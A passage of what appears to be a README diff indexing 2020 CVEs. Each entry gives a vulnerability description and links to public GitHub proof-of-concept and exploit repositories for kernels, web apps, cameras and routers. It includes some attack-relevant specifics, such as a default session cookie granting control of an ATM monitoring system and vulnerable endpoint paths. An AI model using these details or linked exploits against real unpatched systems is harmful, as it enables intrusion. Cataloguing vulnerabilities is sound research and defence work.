camera to use the changed values. + + +- [jet-pentest/CVE-2020-25748](https://github.com/jet-pentest/CVE-2020-25748) + +### CVE-2020-25749 (2020-09-25) + +The Telnet service of Rubetek cameras RV-3406, RV-3409, and RV-3411 cameras (firmware versions v342, v339) could allow an remote attacker to take full control of the device with a high-privileged account. The vulnerability exists because a system account has a default and static password. The Telnet service cannot be disabled and this password cannot be changed via standard functionality. + + +- [jet-pentest/CVE-2020-25749](https://github.com/jet-pentest/CVE-2020-25749) + +### CVE-2020-25769 +- [defrancescojp/CVE-2020-25769](https://github.com/defrancescojp/CVE-2020-25769) + +### CVE-2020-25782 (2021-01-28) + +An issue was discovered on Accfly Wireless Security IR Camera 720P System with software versions v3.10.73 through v4.15.77. There is an unauthenticated stack-based buffer overflow in the function CNetClientManage::ServerIP_Proto_Set during incoming message handling. + + +- [tezeb/accfly](https://github.com/tezeb/accfly) + +### CVE-2020-25790 (2020-09-19) + +Typesetter CMS 5.x through 5.1 allows admins to upload and execute arbitrary PHP code via a .php file inside a ZIP archive. NOTE: the vendor disputes the significance of this report because "admins are considered trustworthy"; however, the behavior "contradicts our security policy" and is being fixed for 5.2 + + +- [7Mitu/CVE-2020-25790](https://github.com/7Mitu/CVE-2020-25790) + +### CVE-2020-25860 (2020-12-21) + +The install.c module in the Pengutronix RAUC update client prior to version 1.5 has a Time-of-Check Time-of-Use vulnerability, where signature verification on an update file takes place before the file is reopened for installation. An attacker who can modify the update file just before it is reopened can install arbitrary code on the device. + + +- [rauc/rauc-1.5-integration](https://github.com/rauc/rauc-1.5-integration) + +### CVE-2020-25867 (2020-10-07) + +SoPlanning before 1.47 doesn't correctly check the security key used to publicly share plannings. It allows a bypass to get access without authentication. + + +- [thomasfady/CVE-2020-25867](https://github.com/thomasfady/CVE-2020-25867) + +### CVE-2020-26061 (2020-10-05) + +ClickStudios Passwordstate Password Reset Portal prior to build 8501 is affected by an authentication bypass vulnerability. The ResetPassword function does not validate whether the user has successfully authenticated using security questions. An unauthenticated, remote attacker can send a crafted HTTP request to the /account/ResetPassword page to set a new password for any registered user. + + +- [missing0x00/CVE-2020-26061](https://github.com/missing0x00/CVE-2020-26061) + +### CVE-2020-26217 (2020-11-16) + +XStream before version 1.4.14 is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14. + + +- [novysodope/CVE-2020-26217-XStream-RCE-POC](https://github.com/novysodope/CVE-2020-26217-XStream-RCE-POC) +- [Al1ex/CVE-2020-26217](https://github.com/Al1ex/CVE-2020-26217) +- [epicosy/XStream-1](https://github.com/epicosy/XStream-1) + +### CVE-2020-26233 (2020-12-08) + +Git Credential Manager Core (GCM Core) is a secure Git credential helper built on .NET Core that runs on Windows and macOS. In Git Credential Manager Core before version 2.0.289, when recursively cloning a Git repository on Windows with submodules, Git will first clone the top-level repository and then recursively clone all submodules by starting new Git processes from the top-level working directory. If a malicious git.exe executable is present in the top-level repository then this binary will be started by Git Credential Manager Core when attempting to read configuration, and not git.exe as found on the %PATH%. This only affects GCM Core on Windows, not macOS or Linux-based distributions. GCM Core version 2.0.289 contains the fix for this vulnerability, and is available from the project's GitHub releases page. GCM Core 2.0.289 is also bundled in the latest Git for Windows release; version 2.29.2(3). As a workaround, users should avoid recursively cloning untrusted repositories with the --recurse-submodules option. + + +- [whr819987540/test_CVE-2020-26233](https://github.com/whr819987540/test_CVE-2020-26233) +- [an1p3lg5/CVE-2020-26233](https://github.com/an1p3lg5/CVE-2020-26233) + +### CVE-2020-26243 (2020-11-25) + +Nanopb is a small code-size Protocol Buffers implementation. In Nanopb before versions 0.4.4 and 0.3.9.7, decoding specifically formed message can leak memory if dynamic allocation is enabled and an oneof field contains a static submessage that contains a dynamic field, and the message being decoded contains the submessage multiple times. This is rare in normal messages, but it is a concern when untrusted data is parsed. This is fixed in versions 0.3.9.7 and 0.4.4. The following workarounds are available: 1) Set the option `no_unions` for the oneof field. This will generate fields as separate instead of C union, and avoids triggering the problematic code. 2) Set the type of the submessage field inside oneof to `FT_POINTER`. This way the whole submessage will be dynamically allocated and the problematic code is not executed. 3) Use an arena allocator for nanopb, to make sure all memory can be released afterwards. + + +- [HimanshuS67/external_nanopb-c_AOSP10_CVE-2020-26243](https://github.com/HimanshuS67/external_nanopb-c_AOSP10_CVE-2020-26243) + +### CVE-2020-26258 (2020-12-16) + +XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories. + + +- [Al1ex/CVE-2020-26258](https://github.com/Al1ex/CVE-2020-26258) + +### CVE-2020-26259 (2020-12-16) + +XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories. + + +- [jas502n/CVE-2020-26259](https://github.com/jas502n/CVE-2020-26259) +- [Al1ex/CVE-2020-26259](https://github.com/Al1ex/CVE-2020-26259) + +### CVE-2020-26413 (2020-12-11) + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. + + +- [Kento-Sec/GitLab-Graphql-CVE-2020-26413](https://github.com/Kento-Sec/GitLab-Graphql-CVE-2020-26413) + +### CVE-2020-26525 (2020-10-02) + +Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter. This allows forcing the database and server to initiate remote connections to third party DNS servers. + + +- [lukaszstu/SmartAsset-SQLinj-CVE-2020-26525](https://github.com/lukaszstu/SmartAsset-SQLinj-CVE-2020-26525) + +### CVE-2020-26526 (2020-10-02) + +An issue was discovered in Damstra Smart Asset 2020.7. It is possible to enumerate valid usernames on the login page. The application sends a different server response when the username is invalid than when the username is valid ("Unable to find an APIDomain" versus "Wrong email or password"). + + +- [lukaszstu/SmartAsset-UE-CVE-2020-26526](https://github.com/lukaszstu/SmartAsset-UE-CVE-2020-26526) + +### CVE-2020-26527 (2020-10-02) + +An issue was discovered in API/api/Version in Damstra Smart Asset 2020.7. Cross-origin resource sharing trusts random origins by accepting the arbitrary 'Origin: example.com' header and responding with 200 OK and a wildcard 'Access-Control-Allow-Origin: *' header. + + +- [lukaszstu/SmartAsset-CORS-CVE-2020-26527](https://github.com/lukaszstu/SmartAsset-CORS-CVE-2020-26527) + +### CVE-2020-26732 (2021-01-14) + +SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session. + + +- [swzhouu/CVE-2020-26732](https://github.com/swzhouu/CVE-2020-26732) + +### CVE-2020-26733 (2021-01-14) + +Cross Site Scripting (XSS) in Configuration page in SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 allows authenticated attacker to inject their own script into the page via DDNS Configuration Section. + + +- [swzhouu/CVE-2020-26733](https://github.com/swzhouu/CVE-2020-26733) + +### CVE-2020-26878 (2020-10-26) + +Ruckus through 1.5.1.0.21 is affected by remote command injection. An authenticated user can submit a query to the API (/service/v1/createUser endpoint), injecting arbitrary commands that will be executed as root user via web.py. + + +- [htarsoo/CVE-2020-26878](https://github.com/htarsoo/CVE-2020-26878) + +### CVE-2020-27190 +- [qlh831/x-CVE-2020-27190](https://github.com/qlh831/x-CVE-2020-27190) + +### CVE-2020-27194 (2020-10-16) + +An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a. + + +- [willinin/CVE-2020-27194-exp](https://github.com/willinin/CVE-2020-27194-exp) +- [xmzyshypnc/CVE-2020-27194](https://github.com/xmzyshypnc/CVE-2020-27194) + +### CVE-2020-27199 (2020-12-17) + +The Magic Home Pro application 1.5.1 for Android allows Authentication Bypass. The security control that the application currently has in place is a simple Username and Password authentication function. Using enumeration, an attacker is able to forge a User specific token without the need for correct password to gain access to the mobile application as that victim user. + + +- [9lyph/CVE-2020-27199](https://github.com/9lyph/CVE-2020-27199) + +### CVE-2020-27223 (2021-02-26) + +In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values. + + +- [motikan2010/CVE-2020-27223](https://github.com/motikan2010/CVE-2020-27223) +- [ttestoo/Jetty-CVE-2020-27223](https://github.com/ttestoo/Jetty-CVE-2020-27223) +- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223_beforepatch) +- [hshivhare67/Jetty_v9.4.31_CVE-2020-27223](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2020-27223) + +### CVE-2020-27252 (2020-12-14) + +Medtronic MyCareLink Smart 25000 all versions are vulnerable to a race condition in the MCL Smart Patient Reader software update system, which allows unsigned firmware to be uploaded and executed on the Patient Reader. If exploited an attacker could remotely execute code on the MCL Smart Patient Reader device, leading to control of the device. + + +- [OccultSlolem/GatorMed](https://github.com/OccultSlolem/GatorMed) + +### CVE-2020-27301 (2021-06-04) + +A stack buffer overflow in Realtek RTL8710 (and other Ameba-based devices) can lead to remote code execution via the "AES_UnWRAP" function, when an attacker in Wi-Fi range sends a crafted "Encrypted GTK" value as part of the WPA2 4-way-handshake. + + +- [chertoGUN/CVE-2020-27301-hostapd](https://github.com/chertoGUN/CVE-2020-27301-hostapd) + +### CVE-2020-27358 (2020-10-31) + +An issue was discovered in REDCap 8.11.6 through 9.x before 10. The messenger's CSV feature (that allows users to export their conversation threads as CSV) allows non-privileged users to export one another's conversation threads by changing the thread_id parameter in the request to the endpoint Messenger/messenger_download_csv.php?title=Hey&thread_id={THREAD_ID}. + + +- [sebastian-mora/cve-2020-27358-27359](https://github.com/sebastian-mora/cve-2020-27358-27359) + +### CVE-2020-27368 (2021-01-14) + +Directory Indexing in Login Portal of Login Portal of TOTOLINK-A702R-V1.0.0-B20161227.1023 allows attacker to access /icons/ directories via GET Parameter. + + +- [swzhouu/CVE-2020-27368](https://github.com/swzhouu/CVE-2020-27368) + +### CVE-2020-27603 (2020-10-21) + +BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files. + + +- [hannob/CVE-2020-27603-bbb-libreoffice-poc](https://github.com/hannob/CVE-2020-27603-bbb-libreoffice-poc) + +### CVE-2020-27688 (2020-11-05) + +RVToolsPasswordEncryption.exe in RVTools 4.0.6 allows users to encrypt passwords to be used in the configuration files. This encryption used a static IV and key, and thus using the Decrypt() method from VISKD.cs from the RVTools.exe executable allows for decrypting the encrypted passwords. The accounts used in the configuration files have access to vSphere instances. + + +- [matthiasmaes/CVE-2020-27688](https://github.com/matthiasmaes/CVE-2020-27688) + +### CVE-2020-27747 (2020-10-29) + +An issue was discovered in Click Studios Passwordstate 8.9 (Build 8973).If the user of the system has assigned himself a PIN code for entering from a mobile device using the built-in generator (4 digits), a remote attacker has the opportunity to conduct a brute force attack on this PIN code. As result, remote attacker retrieves all passwords from another systems, available for affected account. + + +- [jet-pentest/CVE-2020-27747](https://github.com/jet-pentest/CVE-2020-27747) + +### CVE-2020-27786 (2020-12-11) + +A flaw was found in the Linux kernel’s implementation of MIDI, where an attacker with a local account and the permissions to issue ioctl commands to midi devices could trigger a use-after-free issue. A write to this specific memory while freed and before use causes the flow of execution to change and possibly allow for memory corruption or privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. + + +- [kiks7/CVE-2020-27786-Kernel-Exploit](https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit) +- [elbiazo/CVE-2020-27786](https://github.com/elbiazo/CVE-2020-27786) +- [Trinadh465/linux-4.19.72_CVE-2020-27786](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27786) +- [ii4gsp/CVE-2020-27786](https://github.com/ii4gsp/CVE-2020-27786) +- [enlist12/CVE-2020-27786](https://github.com/enlist12/CVE-2020-27786) + +### CVE-2020-27815 (2021-05-26) + +A flaw was found in the JFS filesystem code in the Linux Kernel which allows a local attacker with the ability to set extended attributes to panic the system, causing memory corruption or escalating privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. + + +- [Trinadh465/linux-4.19.72_CVE-2020-27815](https://github.com/Trinadh465/linux-4.19.72_CVE-2020-27815) + +### CVE-2020-27824 (2021-05-13) + +A flaw was found in OpenJPEG’s encoder in the opj_dwt_calc_explicit_stepsizes() function. This flaw allows an attacker who can supply crafted input to decomposition levels to cause a buffer overflow. The highest threat from this vulnerability is to system availability. + + +- [pazhanivel07/openjpeg-2.3.0_CVE-2020-27824](https://github.com/pazhanivel07/openjpeg-2.3.0_CVE-2020-27824) + +### CVE-2020-27838 (2021-03-08) + +A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality. + + +- [Cappricio-Securities/CVE-2020-27838](https://github.com/Cappricio-Securities/CVE-2020-27838) + +### CVE-2020-27904 (2020-12-08) + +A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. An application may be able to execute arbitrary code with kernel privileges. + + +- [pattern-f/xattr-oob-swap](https://github.com/pattern-f/xattr-oob-swap) + +### CVE-2020-27930 (2020-12-08) + +A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. Processing a maliciously crafted font may lead to arbitrary code execution. + + +- [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://github.com/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930) + +### CVE-2020-27935 (2021-04-02) + +Multiple issues were addressed with improved logic. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Big Sur 11.0.1, watchOS 7.1, tvOS 14.2. A sandboxed process may be able to circumvent sandbox restrictions. + + +- [LIJI32/SnatchBox](https://github.com/LIJI32/SnatchBox) + +### CVE-2020-27949 (2021-04-02) + +This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave. A malicious application may cause unexpected changes in memory belonging to processes traced by DTrace. + + +- [seemoo-lab/dtrace-memaccess_cve-2020-27949](https://github.com/seemoo-lab/dtrace-memaccess_cve-2020-27949) + +### CVE-2020-27950 (2020-12-08) + +A memory initialization issue was addressed. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 12.4.9, watchOS 6.2.9, Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave, iOS 14.2 and iPadOS 14.2, watchOS 5.3.9, macOS Catalina 10.15.7 Supplemental Update, macOS Catalina 10.15.7 Update. A malicious application may be able to disclose kernel memory. + + +- [synacktiv/CVE-2020-27950](https://github.com/synacktiv/CVE-2020-27950) +- [lyonzon2/browser-crash-tool](https://github.com/lyonzon2/browser-crash-tool) + +### CVE-2020-27955 (2020-11-05) + +Git LFS 2.12.0 allows Remote Code Execution. + + +- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955) +- [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go](https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955-Go) +- [yhsung/cve-2020-27955-poc](https://github.com/yhsung/cve-2020-27955-poc) +- [r00t4dm/CVE-2020-27955](https://github.com/r00t4dm/CVE-2020-27955) +- [shubham0d/CVE-2020-27955](https://github.com/shubham0d/CVE-2020-27955) +- [TheTh1nk3r/cve-2020-27955](https://github.com/TheTh1nk3r/cve-2020-27955) +- [NeoDarwin/CVE-2020-27955](https://github.com/NeoDarwin/CVE-2020-27955) +- [DeeLMind/CVE-2020-27955-LFS](https://github.com/DeeLMind/CVE-2020-27955-LFS) +- [HK69s/CVE-2020-27955](https://github.com/HK69s/CVE-2020-27955) +- [IanSmith123/CVE-2020-27955](https://github.com/IanSmith123/CVE-2020-27955) +- [Arnoldqqq/CVE-2020-27955](https://github.com/Arnoldqqq/CVE-2020-27955) +- [nob0dy-3389/CVE-2020-27955](https://github.com/nob0dy-3389/CVE-2020-27955) +- [Marsable/CVE-2020-27955-LFS](https://github.com/Marsable/CVE-2020-27955-LFS) +- [FrostsaberX/CVE-2020-27955](https://github.com/FrostsaberX/CVE-2020-27955) +- [whitetea2424/CVE-2020-27955-LFS-main](https://github.com/whitetea2424/CVE-2020-27955-LFS-main) +- [userxfan/cve-2020-27955](https://github.com/userxfan/cve-2020-27955) +- [z50913/CVE-2020-27955](https://github.com/z50913/CVE-2020-27955) +- [Kimorea/CVE-2020-27955-LFS](https://github.com/Kimorea/CVE-2020-27955-LFS) + +### CVE-2020-27976 (2020-10-28) + +osCommerce Phoenix CE before 1.0.5.4 allows OS command injection remotely. Within admin/mail.php, a from POST parameter can be passed to the application. This affects the PHP mail function, and the sendmail -f option. + + +- [k0rnh0li0/CVE-2020-27976](https://github.com/k0rnh0li0/CVE-2020-27976) + +### CVE-2020-28018 (2021-05-06) + +Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL. + + +- [dorkerdevil/CVE-2020-28018](https://github.com/dorkerdevil/CVE-2020-28018) +- [zr0tt/CVE-2020-28018](https://github.com/zr0tt/CVE-2020-28018) + +### CVE-2020-28032 (2020-10-31) + +WordPress before 5.5.2 mishandles deserialization requests in wp-includes/Requests/Utility/FilteredIterator.php. + + +- [nth347/CVE-2020-28032_PoC](https://github.com/nth347/CVE-2020-28032_PoC) + +### CVE-2020-28052 (2020-12-18) + +An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. + + +- [madstap/bouncy-castle-generative-test-poc](https://github.com/madstap/bouncy-castle-generative-test-poc) +- [kurenaif/CVE-2020-28052_PoC](https://github.com/kurenaif/CVE-2020-28052_PoC) + +### CVE-2020-28054 (2020-11-19) + +JamoDat TSMManager Collector version up to 6.5.0.21 is vulnerable to an Authorization Bypass because the Collector component is not properly validating an authenticated session with the Viewer. If the Viewer has been modified (binary patched) and the Bypass Login functionality is being used, an attacker can request every Collector's functionality as if they were a properly logged-in user: administrating connected instances, reviewing logs, editing configurations, accessing the instances' consoles, accessing hardware configurations, etc.Exploiting this vulnerability won't grant an attacker access nor control on remote ISP servers as no credentials is sent with the request. + + +- [VoidSec/Tivoli-Madness](https://github.com/VoidSec/Tivoli-Madness) + +### CVE-2020-28148 +- [fengchenzxc/CVE-2020-28148](https://github.com/fengchenzxc/CVE-2020-28148) + +### CVE-2020-28169 (2020-12-24) + +The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM. + + +- [zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169](https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169) + +### CVE-2020-28243 (2021-02-27) + +An issue was discovered in SaltStack Salt before 3002.5. The minion's restartcheck is vulnerable to command injection via a crafted process name. This allows for a local privilege escalation by any user able to create a files on the minion in a non-blacklisted directory. + + +- [stealthcopter/CVE-2020-28243](https://github.com/stealthcopter/CVE-2020-28243) + +### CVE-2020-28328 (2020-11-06) + +SuiteCRM before 7.11.17 is vulnerable to remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled .php file under the web root. + + +- [mcorybillington/SuiteCRM-RCE](https://github.com/mcorybillington/SuiteCRM-RCE) + +### CVE-2020-28351 (2020-11-09) + +The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page. + + +- [dievus/CVE-2020-28351](https://github.com/dievus/CVE-2020-28351) + +### CVE-2020-28414 (2020-11-12) + +A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28415). + + +- [jet-pentest/CVE-2020-28414](https://github.com/jet-pentest/CVE-2020-28414) + +### CVE-2020-28415 (2020-11-12) + +A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28414). + + +- [jet-pentest/CVE-2020-28415](https://github.com/jet-pentest/CVE-2020-28415) + +### CVE-2020-28458 (2020-12-16) + +All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806. + + +- [fazilbaig1/CVE-2020-28458](https://github.com/fazilbaig1/CVE-2020-28458) + +### CVE-2020-28478 (2021-01-19) + +This affects the package gsap before 3.6.0. + + +- [NetJBS/CVE-2020-28478--PoC](https://github.com/NetJBS/CVE-2020-28478--PoC) + +### CVE-2020-28488 +- [rafaelcintralopes/CVE-2020-28488](https://github.com/rafaelcintralopes/CVE-2020-28488) + +### CVE-2020-28502 (2021-03-05) + +This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run. + + +- [s-index/CVE-2020-28502](https://github.com/s-index/CVE-2020-28502) +- [dpredrag/CVE-2020-28502](https://github.com/dpredrag/CVE-2020-28502) + +### CVE-2020-28647 (2020-11-17) + +In Progress MOVEit Transfer before 2020.1, a malicious user could craft and store a payload within the application. If a victim within the MOVEit Transfer instance interacts with the stored payload, it could invoke and execute arbitrary code within the context of the victim's browser (XSS). + + +- [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://github.com/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647) + +### CVE-2020-28653 (2021-02-03) + +Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet. + + +- [tuo4n8/CVE-2020-28653](https://github.com/tuo4n8/CVE-2020-28653) +- [intrigueio/cve-2020-28653-poc](https://github.com/intrigueio/cve-2020-28653-poc) +- [mr-r3bot/ManageEngine-CVE-2020-28653](https://github.com/mr-r3bot/ManageEngine-CVE-2020-28653) + +### CVE-2020-28874 (2021-01-21) + +reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter). + + +- [varandinawer/CVE-2020-28874](https://github.com/varandinawer/CVE-2020-28874) + +### CVE-2020-28926 (2020-11-30) + +ReadyMedia (aka MiniDLNA) before versions 1.3.0 allows remote code execution. Sending a malicious UPnP HTTP request to the miniDLNA service using HTTP chunked encoding can lead to a signedness bug resulting in a buffer overflow in calls to memcpy/memmove. + + +- [lorsanta/exploit-CVE-2020-28926](https://github.com/lorsanta/exploit-CVE-2020-28926) + +### CVE-2020-28948 (2020-11-19) + +Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked. + + +- [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://github.com/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949) +- [nopdata/cve-2020-28948](https://github.com/nopdata/cve-2020-28948) +- [JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949](https://github.com/JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949) + +### CVE-2020-29007 (2023-04-15) + +The Score extension through 0.3.0 for MediaWiki has a remote code execution vulnerability due to improper sandboxing of the GNU LilyPond executable. This allows any user with an ability to edit articles (potentially including unauthenticated anonymous users) to execute arbitrary Scheme or shell code by using crafted {{Image data to generate musical scores containing malicious code. + + +- [seqred-s-a/cve-2020-29007](https://github.com/seqred-s-a/cve-2020-29007) + +### CVE-2020-29070 (2020-11-25) + +osCommerce 2.3.4.1 has XSS vulnerability via the authenticated user entering the XSS payload into the title section of newsletters. + + +- [aslanemre/cve-2020-29070](https://github.com/aslanemre/cve-2020-29070) + +### CVE-2020-29134 (2021-03-05) + +The TOTVS Fluig platform allows path traversal through the parameter "file = .. /" encoded in base64. This affects all versions Fluig Lake 1.7.0, Fluig 1.6.5 and Fluig 1.6.4 + + +- [Ls4ss/CVE-2020-29134](https://github.com/Ls4ss/CVE-2020-29134) + +### CVE-2020-29156 (2020-12-27) + +The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action. + + +- [Ko-kn3t/CVE-2020-29156](https://github.com/Ko-kn3t/CVE-2020-29156) + +### CVE-2020-29254 (2020-12-11) + +TikiWiki 21.2 allows templates to be edited without CSRF protection. This could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected system. An attacker could exploit this vulnerability by persuading a user of the interface to follow a maliciously crafted link. A successful exploit could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These action include allowing attackers to submit their own code through an authenticated user resulting in local file Inclusion. If an authenticated user who is able to edit TikiWiki templates visits an malicious website, template code can be edited. + + +- [S1lkys/CVE-2020-29254](https://github.com/S1lkys/CVE-2020-29254) + +### CVE-2020-29364 (2020-11-30) + +In NetArt News Lister 1.0.0, the news headlines vulnerable to stored xss attacks. Attackers can inject codes in news titles. + + +- [aslanemre/CVE-2020-29364](https://github.com/aslanemre/CVE-2020-29364) + +### CVE-2020-29370 (2020-11-28) + +An issue was discovered in kmem_cache_alloc_bulk in mm/slub.c in the Linux kernel before 5.5.11. The slowpath lacks the required TID increment, aka CID-fd4d9c7d0c71. + + +- [nanopathi/linux-4.19.72_CVE-2020-29370](https://github.com/nanopathi/linux-4.19.72_CVE-2020-29370) + +### CVE-2020-29583 (2020-12-22) + +Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges. + + +- [ruppde/scan_CVE-2020-29583](https://github.com/ruppde/scan_CVE-2020-29583) + +### CVE-2020-29599 (2020-12-07) + +ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c. + + +- [lnwza0x0a/CVE-2020-29599](https://github.com/lnwza0x0a/CVE-2020-29599) + +### CVE-2020-29607 (2020-12-16) + +A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution. + + +- [0xAbbarhSF/CVE-2020-29607](https://github.com/0xAbbarhSF/CVE-2020-29607) +- [0xN7y/CVE-2020-29607](https://github.com/0xN7y/CVE-2020-29607) + +### CVE-2020-29661 (2020-12-09) + +A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b. + + +- [wojkos9/arm-CVE-2020-29661](https://github.com/wojkos9/arm-CVE-2020-29661) + +### CVE-2020-29666 (2020-12-10) + +In Lan ATMService M3 ATM Monitoring System 6.1.0, due to a directory-listing vulnerability, a remote attacker can view log files, located in /websocket/logs/, that contain a user's cookie values and the predefined developer's cookie value. + + +- [jet-pentest/CVE-2020-29666](https://github.com/jet-pentest/CVE-2020-29666) + +### CVE-2020-29667 (2020-12-10) + +In Lan ATMService M3 ATM Monitoring System 6.1.0, a remote attacker able to use a default cookie value, such as PHPSESSID=LANIT-IMANAGER, can achieve control over the system because of Insufficient Session Expiration. + + +- [jet-pentest/CVE-2020-29667](https://github.com/jet-pentest/CVE-2020-29667) + +### CVE-2020-29669 (2020-12-14) + +In the Macally WIFISD2-2A82 Media and Travel Router 2.000.010, the Guest user is able to reset its own password. This process has a vulnerability which can be used to take over the administrator account and results in shell access. As the admin user may read the /etc/shadow file, the password hashes of each user (including root) can be dumped. The root hash can be cracked easily which results in a complete system compromise. + + +- 